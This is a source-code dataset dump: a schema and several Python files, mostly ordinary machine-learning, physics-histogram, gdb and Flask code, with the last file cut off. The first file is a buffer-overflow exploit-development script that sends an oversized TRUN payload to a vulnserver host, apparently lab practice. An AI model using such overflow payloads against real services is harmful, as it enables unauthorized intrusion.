Dataset schema (ranges are the observed min–max across rows):

| column | dtype | observed range / classes |
|---|---|---|
| blob_id | string | length 40–40 |
| directory_id | string | length 40–40 |
| path | string | length 2–616 |
| content_id | string | length 40–40 |
| detected_licenses | list | length 0–69 |
| license_type | string | 2 classes |
| repo_name | string | length 5–118 |
| snapshot_id | string | length 40–40 |
| revision_id | string | length 40–40 |
| branch_name | string | length 4–63 |
| visit_date | timestamp[us] | |
| revision_date | timestamp[us] | |
| committer_date | timestamp[us] | |
| github_id | int64 | 2.91k–686M, nullable (⌀) |
| star_events_count | int64 | 0–209k |
| fork_events_count | int64 | 0–110k |
| gha_license_id | string | 23 classes |
| gha_event_created_at | timestamp[us] | |
| gha_created_at | timestamp[us] | |
| gha_language | string | 213 classes |
| src_encoding | string | 30 classes |
| language | string | 1 class |
| is_vendor | bool | 2 classes |
| is_generated | bool | 2 classes |
| length_bytes | int64 | 2–10.3M |
| extension | string | 246 classes |
| content | string | length 2–10.3M |
| authors | list | length 1–1 |
| author_id | string | length 0–212 |
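A minimal sketch of reading rows with this schema, assuming the Hugging Face `datasets` library and a hypothetical dataset name (the actual dataset is not named here):

```python
from datasets import load_dataset

# Hypothetical dataset path; streaming avoids downloading every content blob.
ds = load_dataset("example-org/source-code-corpus", split="train", streaming=True)

for row in ds.take(2):
    # Each row carries the repo metadata plus the file contents themselves.
    print(row["repo_name"], row["path"], row["license_type"], row["length_bytes"])
```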
blob_id: f94c16d5dafa51a22ec02299b323a9e837bbb34f | directory_id: 754e748200c84138b023f6d2213ae8046df22803
path: /learn/vlunser/space.py | content_id: 832696601f58ed2def6c6effa911cb5dd3e782be
detected_licenses: [] | license_type: no_license | repo_name: 0xarun/bufferoverflow
snapshot_id: e344d44742dbb37b06079ed64a0ec58f120f09bc | revision_id: ce2de29786a686163f3e42d91376499b61d3f0f3 | branch_name: refs/heads/main
visit_date: 2023-02-24T07:12:01.125789 | revision_date: 2021-01-31T07:52:48 | committer_date: 2021-01-31T07:52:48
github_id: 334,601,720 | star_events_count: 0 | fork_events_count: 1
gha_license_id: null | gha_event_created_at: null | gha_created_at: null | gha_language: null
src_encoding: UTF-8 | language: Python | is_vendor: false | is_generated: false | length_bytes: 309 | extension: py
content:
import time, struct, sys
import socket
server = "192.168.225.105"
port = 9999
OFFSET = "A" * 2003
EIP = "BBBB"
SAMPLE = "CCCCC"
space = "D"*1000
req = "TRUN /.:/" + OFFSET + EIP + SAMPLE + space
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((server, port))
print(s.recv(1024))
s.send(req.encode())  # sockets send bytes on Python 3; a plain str only worked on Python 2
s.close()
authors: ["noreply@github.com"] | author_id: 0xarun.noreply@github.com

blob_id: d5b52e5385b25b282446c84c7f35e12d75acb573 | directory_id: 327de59d735c9654ef17b3d13a4b63a68d2598c3
path: /model.py | content_id: fbe3b5f354b251ea1aabf5c8161e11072e029b25
detected_licenses: ["Apache-2.0"] | license_type: permissive | repo_name: jimmycallin/whatelles
snapshot_id: 604ca313be3a98560808569373d33817398be569 | revision_id: e8d74888655a6183b2e04b93e421c0f4939f5dbe | branch_name: refs/heads/master
visit_date: 2021-01-18T04:38:08.403436 | revision_date: 2015-09-10T08:47:30 | committer_date: 2015-09-10T08:47:30
github_id: 33,443,959 | star_events_count: 0 | fork_events_count: 0
gha_license_id: null | gha_event_created_at: null | gha_created_at: null | gha_language: null
src_encoding: UTF-8 | language: Python | is_vendor: false | is_generated: false | length_bytes: 24,467 | extension: py
content:
import theano
import theano.tensor as T
import numpy as np
class MLP(object):
"""Multi-Layer Perceptron Class
    A multilayer perceptron is a feedforward artificial neural network model
    with one or more layers of hidden units and nonlinear activations.
    Intermediate layers usually use tanh or the sigmoid function as their
    activation (defined here by a ``HiddenLayer`` class), while the
    top layer is a softmax layer (defined here by a ``LogisticRegression``
    class).
"""
def __init__(self,
rng,
input,
n_hiddens,
n_out,
activation_function,
cost_function,
vocab_size,
embedding_dimensionality,
no_embeddings):
"""Initialize the parameters for the multilayer perceptron
:type rng: numpy.random.RandomState
:param rng: a random number generator used to initialize weights
:type input: theano.tensor.TensorType
:param input: symbolic variable that describes the input of the
architecture (one minibatch)
:type n_hiddens: list[int]
        :param n_hiddens: list of the number of hidden units for each hidden layer
:type n_out: int
:param n_out: number of output units, the dimension of the space in
which the labels lie
"""
embedding_layer = EmbeddingLayer(rng=rng,
input=input,
vocab_size=vocab_size,
embedding_dimensionality=embedding_dimensionality,
no_embeddings=no_embeddings,
embeddings=None,
activation=activation_function)
self.hidden_layers = [embedding_layer]
prev_layer_n = embedding_layer.n_out
prev_input = embedding_layer.output
for n_hidden in n_hiddens:
hidden_layer = HiddenLayer(rng=rng,
input=prev_input,
n_in=prev_layer_n,
n_out=n_hidden,
activation=activation_function)
self.hidden_layers.append(hidden_layer)
prev_layer_n = n_hidden
prev_input = hidden_layer.output
self.log_regression_layer = LogisticRegression(input=self.hidden_layers[-1].output,
n_in=self.hidden_layers[-1].n_out,
n_out=n_out,
cost_function=cost_function)
l1_hidden_layers = sum([abs(hl.W).sum() for hl in self.hidden_layers])
l2_hidden_layers = sum([(hl.W ** 2).sum() for hl in self.hidden_layers])
self.L1 = l1_hidden_layers + abs(self.log_regression_layer.W).sum()
self.L2_sqr = l2_hidden_layers + (self.log_regression_layer.W ** 2).sum()
self.errors = self.log_regression_layer.errors
self.y_pred = self.log_regression_layer.y_pred
self.calculate_cost = self.log_regression_layer.calculate_cost
self.params = [p for hl in self.hidden_layers for p in hl.params] + self.log_regression_layer.params
class EmbeddingLayer():
def __init__(self,
rng,
input,
vocab_size,
embedding_dimensionality,
no_embeddings,
embeddings=None,
activation=T.nnet.sigmoid):
self.input = T.cast(input, 'int32')
self.activation = activation
batch_size = input.shape[0]
self.embedding_dimensionality = embedding_dimensionality
self.no_embeddings = no_embeddings
self.n_out = no_embeddings * embedding_dimensionality
if embeddings is None:
embeddings = np.asarray(rng.uniform(low=-np.sqrt(6 / (vocab_size + embedding_dimensionality)),
high=np.sqrt(6 / (vocab_size + embedding_dimensionality)),
size=(vocab_size, embedding_dimensionality)),
dtype=theano.config.floatX)
if activation == theano.tensor.nnet.sigmoid:
# Sigmoid demands a larger interval, according to [Xavier10].
embeddings *= 4
embeddings = theano.shared(value=embeddings, name='embeddings', borrow=True)
self.embeddings = embeddings
# Replace all word indices in input with word embeddings
emb_input = self.embeddings[self.input.flatten()]
# Reshape to match original input (times embedding dimensionality on columns)
self.W = emb_input.reshape((batch_size, no_embeddings * embedding_dimensionality))
self.output = self.W if self.activation is None else self.activation(self.W)
self.params = [self.embeddings]
class HiddenLayer():
def __init__(self,
rng,
input,
n_in,
n_out,
W=None,
b=None,
activation=T.tanh):
self.input = input
self.activation = activation
self.n_in = n_in
self.n_out = n_out
if W is None:
W_values = np.asarray(rng.uniform(low=-np.sqrt(6 / (n_in + n_out)),
high=np.sqrt(6 / (n_in + n_out)),
size=(n_in, n_out)),
dtype=theano.config.floatX)
if activation == theano.tensor.nnet.sigmoid:
# Sigmoid demands a larger interval, according to [Xavier10].
W_values *= 4
W = theano.shared(value=W_values, name='W', borrow=True)
if b is None:
b_values = np.zeros((n_out,), dtype=theano.config.floatX)
b = theano.shared(value=b_values, name='b', borrow=True)
self.W = W
self.b = b
lin_output = T.dot(input, self.W) + self.b
self.output = (lin_output if self.activation is None else self.activation(lin_output))
self.params = [self.W, self.b]
class LogisticRegression(object):
"""Multi-class Logistic Regression Class
The logistic regression is fully described by a weight matrix :math:`W`
and bias vector :math:`b`. Classification is done by projecting data
points onto a set of hyperplanes, the distance to which is used to
determine a class membership probability.
"""
def __init__(self, input, n_in, n_out, cost_function):
""" Initialize the parameters of the logistic regression
:type input: theano.tensor.TensorType
:param input: symbolic variable that describes the input of the
architecture (one minibatch)
:type n_in: int
:param n_in: number of input units, the dimension of the space in
which the datapoints lie
:type n_out: int
:param n_out: number of output units, the dimension of the space in
which the labels lie
:type: cost_function: function
:param cost_function: Cost function to use.
"""
self.cost_function = cost_function
# initialize with 0 the weights W as a matrix of shape (n_in, n_out)
self.W = theano.shared(value=np.zeros((n_in, n_out),
dtype=theano.config.floatX),
name='W',
borrow=True)
# initialize the baises b as a vector of n_out 0s
self.b = theano.shared(value=np.zeros((n_out,),
dtype=theano.config.floatX),
name='b',
borrow=True)
self.p_y_given_x = T.nnet.softmax(T.dot(input, self.W) + self.b)
self.y_pred = T.argmax(self.p_y_given_x, axis=1)
# parameters of the model
self.params = [self.W, self.b]
def calculate_cost(self, y):
return self.cost_function(self.p_y_given_x, y)
def predicted(self):
return self.y_pred
def errors(self, y):
"""Return a float representing the number of errors in the minibatch
over the total number of examples of the minibatch ; zero one
loss over the size of the minibatch
:type y: theano.tensor.TensorType
:param y: corresponds to a vector that gives for each example the
correct label
"""
# check if y has same dimension of y_pred
if y.ndim != self.y_pred.ndim:
raise TypeError('y should have the same shape as self.y_pred',
('y', y.type, 'y_pred', self.y_pred.type))
# check if y is of the correct datatype
if y.dtype.startswith('int'):
# the T.neq operator returns a vector of 0s and 1s, where 1
# represents a mistake in prediction
return T.mean(T.neq(self.y_pred, y))
else:
raise NotImplementedError("Input of y needs to have dtype int")
class NNPrediction():
model_parameters = {"n_epochs": "Number of epochs for training.",
"seed": "Seed to use for random initialization.",
"learning_rate": "The rate of learning gradient descent.",
"batch_size": "How large batch for each iteration of training.",
"validation_improvement_threshold": "How much the validation test must improve \
within a given before aborting.",
"min_iterations": "Run at least these many iterations without early stopping.",
"activation_function": "Activation function to use.",
"cost_function": "Cost_function to use.",
"embedding_dimensionality": "The dimensionality of each embedding layer.",
"no_embeddings": "Total number of embedding layers.",
"L1_reg": "The L1 regression factor.",
"L2_reg": "The L2 regression factor.",
"classes": "The training output classes.",
"n_hiddens": "List of hidden layers with each layers dimensionality.",
"window_size": "A tuple of number of words to left and right to condition upon.",
"n_tags": "Number of previous POS tags to look for.",
"ignore_pos_tags": "Whether to ignore this feature type or not.",
"ignore_target_context": "Whether to ignore this feature type or not.",
"ignore_source_context": "Whether to ignore this feature type or not."}
def __init__(self, config):
self.config = config
self.x = T.matrix('x')
self.y = T.ivector('y')
self.n_epochs = config.get('n_epochs', 50)
self.rng = np.random.RandomState(self.config.get('seed', 1))
self.learning_rate = self.config.get('learning_rate', 0.01)
self.batch_size = self.config.get('batch_size', 500)
self.validation_improvement_threshold = self.config.get('validation_improvement_threshold', 0.995)
self.min_iterations = self.config.get('min_iterations', 10000)
self.index = T.lscalar()
def _initialize_classifier(self):
self.config['vocab_size'] = self.no_words
self.classifier = MLP(rng=self.rng,
input=self.x,
n_hiddens=self.config['n_hiddens'],
n_out=self.config['n_out'],
activation_function=self.config['activation_function'],
cost_function=self.config['cost_function'],
vocab_size=self.config['vocab_size'],
embedding_dimensionality=self.config['embedding_dimensionality'],
no_embeddings=self.config['no_embeddings'])
self.cost = (self.classifier.calculate_cost(self.y)
+ self.config.get('L1_reg', 0) * self.classifier.L1
+ self.config.get('L2_reg', 0.0001) * self.classifier.L2_sqr)
gparams = [T.grad(self.cost, param) for param in self.classifier.params]
self.updates = [(param, param - self.learning_rate * gparam)
for param, gparam in zip(self.classifier.params, gparams)]
def _initialize_train_model(self, train_set_x, train_set_y):
"""
Initializes the training model.
Params:
:train_set_x: A matrix of features, where each row corresponds to a new training instance.
:train_set_y: A list of corresponding training outputs.
Returns a training model theano function, taking a batch index as input.
"""
shared_x = theano.shared(np.asarray(train_set_x, dtype=theano.config.floatX),
borrow=True)
shared_y = theano.shared(np.asarray(train_set_y, dtype=theano.config.floatX),
borrow=True)
# GPU only handles float32 while the output should actually be int.
shared_y = T.cast(shared_y, 'int32')
batch_interval = slice(self.index * self.batch_size, (self.index + 1) * self.batch_size)
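        # Theano's 'givens' substitution: each call train_model(i) swaps the
        # i-th minibatch slice of the shared arrays into self.x / self.y, so
        # the data stays resident (e.g. on the GPU) between iterations.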
train_model = theano.function(inputs=[self.index],
outputs=self.cost,
updates=self.updates,
givens={self.x: shared_x[batch_interval],
self.y: shared_y[batch_interval]}
)
return train_model
def _initialize_test_model(self, test_set_x):
"""
Initializes the test model.
Params:
:test_set_x: A matrix of features, where each row corresponds to a new instance.
Returns a test model theano function. When calling the function, it runs the test.
The test model outputs a list of predicted classes.
"""
shared_x = theano.shared(np.asarray(test_set_x, dtype=theano.config.floatX),
borrow=True)
# batch_interval = slice(self.index * self.batch_size, (self.index + 1) * self.batch_size)
test_model = theano.function(inputs=[],
outputs=self.classifier.y_pred,
givens={self.x: shared_x})
return test_model
def _initialize_dev_model(self, train_set_x, train_set_y):
"""
Initializes the development model.
Params:
:test_set_x: A matrix of features, where each row corresponds to a new instance.
Returns a dev model theano function. When calling the function, it runs the test.
Output of dev model is the mean error value.
"""
shared_x = theano.shared(np.asarray(train_set_x, dtype=theano.config.floatX),
borrow=True)
shared_y = theano.shared(np.asarray(train_set_y, dtype=theano.config.floatX),
borrow=True)
# GPU only handles float32 while the output should actually be int.
shared_y = T.cast(shared_y, 'int32')
test_model = theano.function(inputs=[],
outputs=self.classifier.errors(self.y),
givens={self.x: shared_x,
self.y: shared_y})
return test_model
def train(self, training_data, validation_data=None):
"""
Trains the classifier given a training set (list of data_utils.Sentence instances).
If given a validation set, validate the improvement of the model every :validation_frequency:th time.
If no improvements have happened for a while, abort the training early.
"""
train_set_x, train_set_y = self.featurify(training_data, update_vocab=True)
self._initialize_classifier()
train_model = self._initialize_train_model(train_set_x, train_set_y)
validation_model = None
if validation_data is not None:
validation_set_x, validation_set_y = self.featurify(validation_data)
validation_model = self._initialize_dev_model(validation_set_x, validation_set_y)
best_error_rate = np.inf
n_train_batches = len(train_set_x) // self.batch_size
epoch = 0
iteration = 0
best_iteration = None
break_early = False
if validation_model is not None:
patience = self.min_iterations
validation_frequency = min(n_train_batches, patience // 2)
else:
patience = self.n_epochs * len(train_set_x)
for epoch in range(self.n_epochs):
if break_early:
break
print("Training epoch {}".format(epoch))
for minibatch_index in range(n_train_batches):
iteration = epoch * n_train_batches + minibatch_index
train_model(minibatch_index)
if validation_model is not None and (iteration + 1) % validation_frequency == 0:
error_rate = self._evaluate(validation_model, self.batch_size, len(validation_set_x))
print("Validation error rate: {}, epoch {}, minibatch {}".format(error_rate,
epoch,
minibatch_index))
if error_rate < best_error_rate:
if error_rate < best_error_rate * self.validation_improvement_threshold:
patience = max(patience, iteration * 2)
best_error_rate = error_rate
best_iteration = iteration
if patience <= iteration:
print("Breaking at iteration {}".format(iteration))
break_early = True
break
print("Finished training model.")
if validation_model is not None:
print("Best validation error rate: {} on iteration {}".format(best_error_rate, best_iteration))
def predict(self, test_data):
test_set_x, test_set_y = self.featurify(test_data)
test_model = self._initialize_test_model(test_set_x)
predictions = self._evaluate(test_model, self.batch_size, len(test_set_x))
return predictions
def _evaluate(self, test_model, batch_size, test_set_length):
return test_model()
def output(self, predictions, output_path):
"""
Outputs the prediction results in a format recognized by the discoMT_scorer.pl.
"""
pred_iter = iter(predictions)
test_instances = []
with open(self.config['development_filepath']) as test_data:
for line in test_data:
(class_labels,
removed_words,
source_sentence,
target_sentence,
alignments) = [x.strip() for x in line.split('\t')]
class_labels = class_labels.split()
removed_words = removed_words.split()
instances_predicted = []
for _ in range(len(class_labels)):
instances_predicted.append(self.classes[next(pred_iter)])
test_instances.append([instances_predicted,
removed_words, source_sentence, target_sentence, alignments])
if output_path is not None:
with open(output_path, 'w') as output:
for line in test_instances:
line_str = ""
for column in line[:2]:
line_str += " ".join(column) + "\t"
line_str += "\t".join(line[2:])
print(line_str)
output.write(line_str + "\n")
class PronounPrediction(NNPrediction):
"""
This is the main model for cross-lingual pronoun prediction.
"""
model_parameters = dict(NNPrediction.model_parameters)
def __init__(self, config):
self._word2id = dict()
self.classes = config['classes']
self.no_words = 0
config['n_out'] = len(self.classes)
self.word2id("UNK", update_vocab=True) # initialize unknown id
super().__init__(config)
def featurify(self, sentences, update_vocab=False):
"""
Param sentences: list of data_utils.Sentence instances
"""
x_matrix = []
y_vector = []
for sentence in sentences:
target_contexts = sentence.removed_words_target_contexts(*self.config['window_size'])
source_contexts = sentence.removed_words_source_contexts(*self.config['window_size'])
sentence_details = zip(sentence.removed_words_source_indices, target_contexts, source_contexts)
for k, (source_indices, target_context, source_context) in enumerate(sentence_details):
features = []
if not self.config.get('ignore_target_context', False):
# Add target context features
for i, context_word in enumerate(target_context):
if i != len(target_context) // 2: # ignore word to replace
features.append(self.word2id(context_word, update_vocab=update_vocab))
if not self.config.get('ignore_source_context', False):
# Add source context features
for context_word in source_context:
if isinstance(context_word, list):
features.append(self.word2id(context_word[0], update_vocab=update_vocab))
else:
features.append(self.word2id(context_word, update_vocab=update_vocab))
if not self.config.get('ignore_pos_tags', False):
# Add n_tags previous nouns
noun_tags = ("NN", "NNS", "NNP", "NNPS", "PRP", "PRP$")
for nouns in sentence.get_previous_target_words_with_tag(source_indices[0],
self.config['n_tags'], tags=noun_tags):
# only add first target noun
features.append(self.word2id(nouns[0]))
# Add n_tags previous articles
article_tags = ("DT",)
for articles in sentence.get_previous_target_words_with_tag(source_indices[0],
self.config['n_tags'],
tags=article_tags):
# only add first target noun
features.append(self.word2id(articles[0]))
x_matrix.append(features)
# only store y values when we actually know them. some test data comes without.
if len(sentence.classes) > 0:
y_vector.append(self.classes.index(sentence.classes[k]))
return np.asarray(x_matrix, dtype=np.int32), np.asarray(y_vector, dtype=np.int32)
def word2id(self, word, update_vocab=False):
"""
Generates and retrieves the index of a given word, used for getting the corresponding embedding.
"""
if word not in self._word2id and update_vocab:
self._word2id[word] = self.no_words
self.no_words += 1
elif word not in self._word2id and not update_vocab:
return self.word2id("UNK", update_vocab=True)
return self._word2id[word]
def negative_log_likelihood(y_pred, y):
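    # T.log(y_pred) is a (batch, n_classes) matrix; indexing it with
    # [T.arange(y.shape[0]), y] picks each row's log-probability of its gold
    # label, and the negated mean over the batch is the NLL.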
return -T.mean(T.log(y_pred)[T.arange(y.shape[0]), y])
def cross_entropy(y_pred, y):
c_entrop = T.sum(T.nnet.categorical_crossentropy(y_pred, y))
return c_entrop
authors: ["jimmy.callin@gmail.com"] | author_id: jimmy.callin@gmail.com

blob_id: 1e273a85868f0f6b461bfd41551779c6a908e717 | directory_id: eab72229ae04d1160704cbf90a08a582802a739c
path: /pipeline.py | content_id: 951739aed5ac7ad0818e105dbff2397a48108344
detected_licenses: ["MIT"] | license_type: permissive | repo_name: megatazm/Crowd-Counting
snapshot_id: 444d39b0e3d6e98995f53badf4c073829038b6b7 | revision_id: 647a055baccee2c3b6b780f38930e2ffd14d1664 | branch_name: refs/heads/master
visit_date: 2022-04-01T04:49:16.409675 | revision_date: 2020-01-31T21:24:02 | committer_date: 2020-01-31T21:24:02
github_id: null | star_events_count: 0 | fork_events_count: 0
gha_license_id: null | gha_event_created_at: null | gha_created_at: null | gha_language: null
src_encoding: UTF-8 | language: Python | is_vendor: false | is_generated: false | length_bytes: 518 | extension: py
content:
import os
# Crop area
#os.system("python3 crop.py")
## APPROACH 1 MCNN
os.system("python3 put_zero_image.py")
os.system("python3 test.py")
os.system("python3 put_zero_den.py")
os.system("python3 find_people.py")
os.system("python3 position.py")
## APPROACH 2 - RNN
#os.system("python3 tiny_face_eval.py --weight_file_path weight --prob_thresh 0.04 --nms_thresh 0.0")
## TRACKING
# Put heads into file
#os.system("python3 get_heads.py")
# Track heads among videos
#os.system("python3 track_video.py")
authors: ["gpsunicamp016@gmail.com"] | author_id: gpsunicamp016@gmail.com

blob_id: 0d0b792b12ae89e4345a54d9f5615577cc7c649f | directory_id: 9c09818cd7eabfe56c4744ab879f9e460f49add0
path: /gui/adapt.py | content_id: 2210583aac5ee7946f633f9123aabb12def3c1b5
detected_licenses: [] | license_type: no_license | repo_name: shamjithkv/gdb-gui
snapshot_id: 5498d2041829925917498cb34c22cec1e68deb73 | revision_id: b21838a4ea1a68f9d14511f53f4c5c1196478a0c | branch_name: refs/heads/master
visit_date: 2020-07-27T22:48:30.282103 | revision_date: 2017-08-28T16:52:57 | committer_date: 2017-09-06T12:29:00
github_id: 209,237,135 | star_events_count: 1 | fork_events_count: 0
gha_license_id: null | gha_event_created_at: 2019-09-18T06:42:57 | gha_created_at: 2019-09-18T06:42:57 | gha_language: null
src_encoding: UTF-8 | language: Python | is_vendor: false | is_generated: false | length_bytes: 2,012 | extension: py
content:
# Copyright (C) 2015, 2016 Tom Tromey <tom@tromey.com>
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
# Adapt to gdb issues.
import gdb
import gui.params
# The rule for adding a new entry here is that the bug must have some
# notable user-visible effect.
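# For example, gui code calls notify_bug(15620) when the event is missing;
# the entry is then deleted from the dict below, so each warning prints once.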
bugs = {
15620: """Your gdb doesn't have a "new breakpoint" event.
This means that the source windows will not show you where
breakpoints have been set.""",
13598: """Your gdb doesn't have a "before prompt" event.
This means that various windows won't be able to react to
commands like "up" or "down".""",
18385: """Your gdb doesn't expose locations on a gdb.Breakpoint.
This can be worked around, but maybe not always reliably.
This means that sometimes breakpoints won't display in source windows.""",
18620: """Your gdb doesn't have a "breakpoint modified" event.
This means that when a pending breakpoint is resolved, the GUI won't
be able to update to reflect that fact."""
}
_warning = """See https://sourceware.org/bugzilla/show_bug.cgi?id=%s
for more information."""
_first_report = True
def notify_bug(bugno):
if not gui.params.warn_missing.value:
return
if not (bugno in bugs):
return
print("################")
print(bugs[bugno])
print(_warning % bugno)
print("")
print("You can use 'set gui mention-missing off' to disable this message.")
print("################")
del bugs[bugno]
authors: ["tom@tromey.com"] | author_id: tom@tromey.com

blob_id: 7239911c21420bb41edadd6bdde52c22a6ffe90f | directory_id: 30eeca4d18bd863260882272cf391b1531dcc871
path: /Limits/test/collectHistos.py | content_id: 5d7c3438171cde65afbc7ca6b8ae0c9b6bdadbf6
detected_licenses: [] | license_type: no_license | repo_name: decosa/Stat
snapshot_id: 3b1a5dabf563366b8117fbc56ceef338b719ad6e | revision_id: 10ba54677f401e574ed803bf739f714c5fd62338 | branch_name: refs/heads/master
visit_date: 2020-04-28T16:53:55.142130 | revision_date: 2019-11-26T14:58:29 | committer_date: 2019-11-26T14:58:29
github_id: 175,427,511 | star_events_count: 0 | fork_events_count: 6
gha_license_id: null | gha_event_created_at: null | gha_created_at: null | gha_language: null
src_encoding: UTF-8 | language: Python | is_vendor: false | is_generated: false | length_bytes: 5,232 | extension: py
content:
import ROOT
import os, sys
import optparse
import copy
from Stat.Limits.settings import processes, histos
usage = 'usage: %prog -p histosPath -o outputFile'
parser = optparse.OptionParser(usage)
parser.add_option('-i', '--input', dest='path', type='string', default= "./histos2017v6/",help='Where can I find input histos?')
parser.add_option("-o","--outputFile",dest="output",type="string",default="histos_2017.root",help="Name of the output file collecting histos in Combine user frieldy schema. Default is histos.root")
parser.add_option("-s","--stat",dest="mcstat",action='store_true', default=False)
(opt, args) = parser.parse_args()
sys.argv.append('-b')
path_ = opt.path
ofilename = opt.output
mcstat = opt.mcstat
# Creating output file
ofile = ROOT.TFile(ofilename,"RECREATE")
ofile.Close()
# Getting list of files in histos
print os.listdir(path_)
sampFiles = [f for f in os.listdir(path_) if (os.path.isfile(os.path.join(path_, f)) and f.endswith(".root") and f!=ofilename )]
year = ""
if("2016" in path_ or "20161718" in path_): year = "2016"
elif("2017" in path_): year = "2017"
elif("2018" in path_): year = "2018"
#*******************************************************#
# #
# FILLING IN THE INPUT ROOT FILE FOR COMBINE #
# #
#*******************************************************#
histos_data = []
for f in sampFiles:
try:
ifile = ROOT.TFile.Open(path_ + f)
except IOError:
print "Cannot open ", f
else:
print "Opening file ", f
ifile.cd()
samp = f.replace(".root", "")
print "We are looking into file: ", f
ofile = ROOT.TFile(ofilename,"UPDATE")
for k_, h_ in histos.iteritems():
print "We are looking for object ", h_
h = ifile.Get(h_)
if not os.path.isdir( k_+ "_" + year):
newsubdir = ofile.mkdir(k_ + "_" +year)
ofile.cd(k_+ "_" +year)
if(samp.startswith("Data")): samp = "data_obs"
#print "We are looking for histo %s for samp %s in %s" % (h_, samp, f)
h.SetName(samp)
h.Write(samp, ROOT.TObject.kWriteDelete)
if(samp.startswith("Data")): histos_data.append(h)
nBinsX = h.GetNbinsX()
#print "SAMP ",samp
if k_ in samp: samp = samp.replace("_" + k_, "")
elif "cat" in samp: samp = samp.replace("cat_", "")
#print "SAMP after channel removal ",samp
if(samp.startswith("data")): samp = "Data"
# h_ = h_[:4]
if(samp.startswith("SVJ") and not (samp.endswith("Up") or samp.endswith("Down")) and mcstat == True ):
for n in xrange(nBinsX):
hNameUp = "%s_mcstat_%s_bin%d_Up" % ( h_, samp, n+1)
hNameDown = "%s_mcstat_%s_bin%d_Down" % ( h_, samp, n+1)
print "Histogram: ", hNameUp
h_mcStatUp = ifile.Get(hNameUp)
h_mcStatDown = ifile.Get(hNameDown)
h_mcStatUp.SetName("%s_mcstat_%s_%s_%s_bin%dUp" % (samp, k_, year, samp, n+1))
h_mcStatUp.Write("%s_mcstat_%s_%s_%s_bin%dUp" % (samp, k_, year, samp, n+1), ROOT.TObject.kWriteDelete)
h_mcStatDown.SetName("%s_mcstat_%s_%s_%s_bin%dDown" % (samp, k_, year, samp, n+1))
h_mcStatDown.Write("%s_mcstat_%s_%s_%s_bin%dDown" % (samp, k_, year, samp, n+1), ROOT.TObject.kWriteDelete)
ofile.Write()
ofile.Close()
#*******************************************************#
# #
# CREATING TOTAL BACKGROUND HISTOS #
# #
#*******************************************************#
histData = dict(zip(histos.keys(), [None]*len(histos.keys())))
for p in processes:
try:
ifile = ROOT.TFile.Open(path_ + p +".root")
except IOError:
print "Cannot open ", p +".root"
else:
print "Opening file ", p +".root"
ifile.cd()
for k_, h_ in histos.iteritems():
tmphist = ifile.Get( h_)
if histData[k_] is None:
histData[k_] = copy.deepcopy(tmphist)
else: histData[k_].Add(tmphist)
ofile = ROOT.TFile(ofilename,"UPDATE")
for k_ in histos.keys():
print "Creating Bkg histogram "
#if not os.path.isdir( k_ + "_" + year):
# newsubdir = ofile.mkdir(k_+"_" + year)
ofile.cd(k_+ "_" + year)
histData[k_].SetName("Bkg")
histData[k_].Write("Bkg", ROOT.TObject.kWriteDelete)
print "Bkg integral ", histData[k_].Integral()
bkgpdf = histData[k_].Clone("BkgPdf")
bkgpdf.Scale(1./ bkgpdf.Integral())
print "Bkg pdf ", bkgpdf.Integral()
histdata = bkgpdf.Clone("data_obs")
histdata.Reset()
print "data pdf ", histdata.Integral()
histdata.FillRandom(bkgpdf, int(histData[k_].Integral()))
print "data ", histdata.Integral()
#histData[k_].SetName("data_obs")
histdata.Write("data_obs", ROOT.TObject.kWriteDelete)
print "MCSTAT ", mcstat
ofile.Write()
ofile.Close()
authors: ["decosa@t3ui03.psi.ch"] | author_id: decosa@t3ui03.psi.ch

blob_id: 1dce9e2b6a0d7482d47bab26f855b928218015ad | directory_id: ed7f129761f6ef2feaa3808c52bb306522911950
path: /app/main/__init__.py | content_id: a7fafd9bbdc8a3505fd7bca1b7159365735f55a0
detected_licenses: [] | license_type: no_license | repo_name: dpvitt/notes
snapshot_id: de7f55ad782a727cbd684b6b79ca2a4e38cf642d | revision_id: 3d7171fdc401a5c38e757b27e2dfee2b857e8939 | branch_name: refs/heads/master
visit_date: 2020-12-25T11:15:29.331707 | revision_date: 2016-07-02T21:54:05 | committer_date: 2016-07-02T21:54:05
github_id: 61,044,112 | star_events_count: 0 | fork_events_count: 0
gha_license_id: null | gha_event_created_at: null | gha_created_at: null | gha_language: null
src_encoding: UTF-8 | language: Python | is_vendor: false | is_generated: false | length_bytes: 105 | extension: py
content:
from flask import Blueprint
main_route = Blueprint('main_route', __name__)
from . import views, errors
authors: ["daniel@danielpavitt.com"] | author_id: daniel@danielpavitt.com

blob_id: 4a8ada6d088f1323d8cca6167d34a3532ee51e6b | directory_id: be272ddb3de512a7d7f4652ebf94b27052a3e211
path: /code/amalgamtion_with_batch_label.py | content_id: b8bcd5d4e2bc9975c4f8627b7c1a103c81a390a9
detected_licenses: [] | license_type: no_license | repo_name: ouc-nlp/KABI
snapshot_id: d3ba7dd21a008be36e4c46ceeb7f3c8da4da6523 | revision_id: f5720a5ef5c61fb5f46d97c0b15de469ef34a564 | branch_name: refs/heads/master
visit_date: 2023-02-22T18:42:28.521913 | revision_date: 2021-01-22T10:17:25 | committer_date: 2021-01-22T10:17:25
github_id: 331,868,769 | star_events_count: 0 | fork_events_count: 0
gha_license_id: null | gha_event_created_at: null | gha_created_at: null | gha_language: null
src_encoding: UTF-8 | language: Python | is_vendor: false | is_generated: false | length_bytes: 3,922 | extension: py
content:
import os
import torch
import torch.cuda as tc
from torchvision import transforms
from utils.MyImageFolder import ImagesListFileFolder
from networks.resnet18_for_cifer100 import resnet18
import torch.nn as nn
from utils.AverageMeter import AverageMeter
from networks.rps_net_mlp import RPS_net_mlp
from torchvision import models
import argparse
from utils.Utils import accuracy, get_concat_val_loader
_model_dict = {
'rps_net_mlp': RPS_net_mlp,
'resnet18': resnet18,
'standard_resnet18': models.resnet18
}
_dataset_class_number = {
'mnist':10,
'cifar100':100,
'ilsvrc2012':1000
}
"""
the accurcy of amalgamation models with batch labels
"""
def get_parser():
parser = argparse.ArgumentParser()
parser.add_argument("--data_root", type=str, default='../datasets_folder')
parser.add_argument("--model_root", type=str, default='../model')
parser.add_argument("--dataset_name", type=str, default='cifar100')
